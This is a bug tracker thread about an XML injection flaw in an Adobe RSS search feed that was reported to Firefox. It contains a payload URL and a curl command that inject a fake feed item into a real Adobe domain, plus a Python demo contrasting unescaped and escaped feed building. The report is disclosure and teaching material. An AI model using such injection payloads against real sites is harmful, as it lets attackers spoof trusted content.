Closed
Bug 1330256
Opened 8 years ago
Closed 8 years ago
HTML Injection into RSS reader (II)
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: jm.acuna73, Unassigned)
Details
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Steps to reproduce:
This time we can close the <title> tag and thus manipulate the entire XML document in the adobe.com domain.
In this example I show a single item, but I could add as many as I wanted by modifying the value of the itemsPerPage parameter.
https://color.adobe.com/rss/search.cfm?searchQuery=HTML Injection into RSS reader (II)</title><item><title>HTML Injection into RSS reader (II)</title><link>https://bughunter.withgoogle.com/profile/0d0d6514-b648-4105-b73a-bbed4352e9bc</link><description><![CDATA[
<h4><font color='brown'>Profile</font></h4>
After finishing my higher education, I specialised in programming for web technologies.<p> Since then I have worked as an analyst-programmer at the company Baratz, Servicios de Teledocumentacion.</p>I am also part of the new technologies team at the company Finanser Asesores and I am webmaster of the firm delPueyoDiaz.<p>Very interested in mobile technology.</p>
<h4><font color='brown'>Web environments</font></h4>
(X)HTML, HTML5, CSS 2, CSS3, Javascript, AJAX, JQuery, cross-browser, xml, xslt, W3C standardization, JQuery Mobile, Sencha Touch 2.0 (Mobile App Development Platform).<p>
<img border='1' title='profile' src='https://media.licdn.com/mpr/mpr/shrinknp_200_200/p/8/000/1ce/09e/0c204d9.jpg' height='100' hspace='20' vspace='0'><a href='https://bughunter.withgoogle.com/profile/0d0d6514-b648-4105-b73a-bbed4352e9bc'><strong>jm.acuna73@gmail.com</strong></a></p>
]]></description><pubDate> Thu, 01 Dec 2016 14:50:58 GMT</pubDate><author><![CDATA[Hack jm.acuna73@gmail.com]]></author></item><title>'HTML Injection into RSS reader (II)&key=4EA137CD2D1440A2CF7CA183070D11F7&itemsPerPage=1
Tested on Mozilla Firefox 50.1.0, Google Chrome Version 55.0.2883.87 m with the extension https://chrome.google.com/webstore/detail/rss-subscription-extensio/nlbjncdgjeocebhnmkbbbdekmmmcbfjd
and Internet Explorer 11.
Actual results:
I can manipulate the entire contents of the XML document.
Expected results:
The feed reader should be able to escape certain characters.
Comment 1•8 years ago
This is an XML injection flaw in Adobe's website. The actual XML document contains your markup, and so we parse it correctly, because it's what the server gives us. You can see this both if you 'view source' on the feed and if you fetch it with e.g. curl (I used a shorter version of your example, and URI escaped it for use in the terminal):
$ curl 'https://color.adobe.com/rss/search.cfm?searchQuery=HTML%20Injection%20into%20RSS%20reader%20(II)%3C%2Ftitle%3E%3Citem%3E%3Ctitle%3EHTML%20Injection%20into%20RSS%20reader%20(II)%3C%2Ftitle%3E%3Clink%3Ehttps%3A%2F%2Fbughunter.withgoogle.com%2Fprofile%2F0d0d6514-b648-4105-b73a-bbed4352e9bc%3C%2Flink%3E%3Cdescription%3E%3C!%5BCDATA%5B%20Hello%20%5D%5D%3E%3C%2Fdescription%3E%3CpubDate%3E%20Thu%2C%2001%20Dec%202016%2014%3A50%3A58%20GMT%3C%2FpubDate%3E%3Cauthor%3E%3C!%5BCDATA%5BHack%20jm.acuna73%40gmail.com%5D%5D%3E%3C%2Fauthor%3E%3C%2Fitem%3E%3Ctitle%3EHTML%20Injection%20into%20RSS%20reader%20(II)&key=4EA137CD2D1440A2CF7CA183070D11F7&itemsPerPage=1'
<?xml version="1.0" encoding="UTF-8"?>
<rss
xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:rss="http://blogs.law.harvard.edu/tech/rss"
xmlns:kuler="http://kuler.adobe.com/kuler/API/rss/" version="2.0">
<channel>
<title>kuler search results for 'HTML Injection into RSS reader (II)</title><item><title>HTML Injection into RSS reader (II)</title><link>https://bughunter.withgoogle.com/profile/0d0d6514-b648-4105-b73a-bbed4352e9bc</link><description><![CDATA[ Hello ]]></description><pubDate> Thu, 01 Dec 2016 14:50:58 GMT</pubDate><author><![CDATA[Hack jm.acuna73@gmail.com]]></author></item><title>HTML Injection into RSS reader (II)'</title>
<link>https://color.adobe.com</link>
<description>0 kuler themes were found. Displaying results 1 to 1.</description>
<language>en-us</language>
<pubDate/>
<lastBuildDate/>
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
<generator>Kuler Services</generator>
<managingEditor>kulerfeedback@adobe.com</managingEditor>
<webMaster>kulerfeedback@adobe.com</webMaster>
<recordCount>0</recordCount>
<startIndex>0</startIndex>
<itemsPerPage>1</itemsPerPage>
</channel>
</rss>
For this to be a Firefox bug, the </title> closing would have to have been XML-escaped by the server, which it hasn't been.
Marking INVALID because it's not a Firefox bug (which also explains why you can reproduce it elsewhere!). I suggest you report it to Adobe instead. Keeping sec-sensitive because they might want to fix it before it's public.
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → INVALID
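To make the distinction in the comment above concrete (the server concatenates the raw search string into the feed, so the `</title><item>...` sequence reaches the client as real markup, and a correct parser has nothing to "escape"), here is an added example that is not code from the bug report, from Adobe, or from Firefox. It builds a minimal RSS feed the way the vulnerable endpoint evidently does, then the way it should, and parses both with a standards-conforming XML parser. The feed builder, its field names, the `example.invalid` link and the payload text are all constructed for this illustration; only the injection pattern (close `<title>`, inject an `<item>`, re-open `<title>` so the document stays well-formed) mirrors the report.

```python
"""Server-side XML injection into an RSS feed: vulnerable builder vs fixed one.

Hypothetical code written for this page; it is not Adobe's feed generator.
"""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed payload in the spirit of the report: it closes the channel
# <title>, injects a complete <item> (with a CDATA description, as a reader
# would render it), and re-opens <title> so the document stays well-formed.
PAYLOAD = (
    "HTML Injection into RSS reader (II)</title>"
    "<item><title>injected item</title>"
    "<link>https://example.invalid/</link>"
    "<description><![CDATA[ Hello ]]></description>"
    "</item><title>HTML Injection into RSS reader (II)"
)


def build_feed_unescaped(query: str, items_per_page: int = 1) -> str:
    """Vulnerable: the raw query string is concatenated straight into XML
    (the behaviour the curl output in Comment 1 shows)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<rss version="2.0">\n<channel>\n'
        f"<title>search results for '{query}'</title>\n"
        "<link>https://example.invalid</link>\n"
        f"<itemsPerPage>{int(items_per_page)}</itemsPerPage>\n"
        "</channel>\n</rss>\n"
    )


def build_feed_escaped(query: str, items_per_page: int = 1) -> str:
    """Fixed: user input is XML-escaped (&, <, > become entities) before it is
    placed in element content, so it can never terminate or open a tag."""
    return build_feed_unescaped(escape(query), items_per_page)


def count_items(feed_xml: str) -> int:
    """Number of <item> elements a conforming parser sees in the channel."""
    root = ET.fromstring(feed_xml)
    return len(root.findall("./channel/item"))


def channel_title(feed_xml: str) -> str:
    """Text of the first <channel><title> (entities already decoded)."""
    return ET.fromstring(feed_xml).findtext("./channel/title")


def item_descriptions(feed_xml: str) -> list:
    """Description text of every item, to show the injected CDATA arrives
    at the client as ordinary, renderable content."""
    root = ET.fromstring(feed_xml)
    return [it.findtext("description") for it in root.findall("./channel/item")]


if __name__ == "__main__":
    bad = build_feed_unescaped(PAYLOAD)
    good = build_feed_escaped(PAYLOAD)
    print("unescaped feed: items =", count_items(bad), "title =", repr(channel_title(bad)))
    print("escaped feed:   items =", count_items(good), "title =", repr(channel_title(good)))
```

Both documents are well-formed XML, which is exactly why a feed reader cannot tell the injected item apart from a legitimate one: the parser does its job in both cases. The escaped version keeps the whole payload as literal title text (`findtext` returns it unchanged once entities are decoded) and yields zero items, which is the only fix that belongs on the server side.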
Reporter
Comment 2•8 years ago
Thanks Gijs,
the Adobe team is also aware of the bug.
Updated•8 years ago
Group: firefox-core-security → core-security-release
Reporter
Comment 3•8 years ago
It can be made public.
The bug has been fixed by the Adobe team: https://hackerone.com/reports/187648
Thanks!
Updated•8 years ago
Group: core-security-release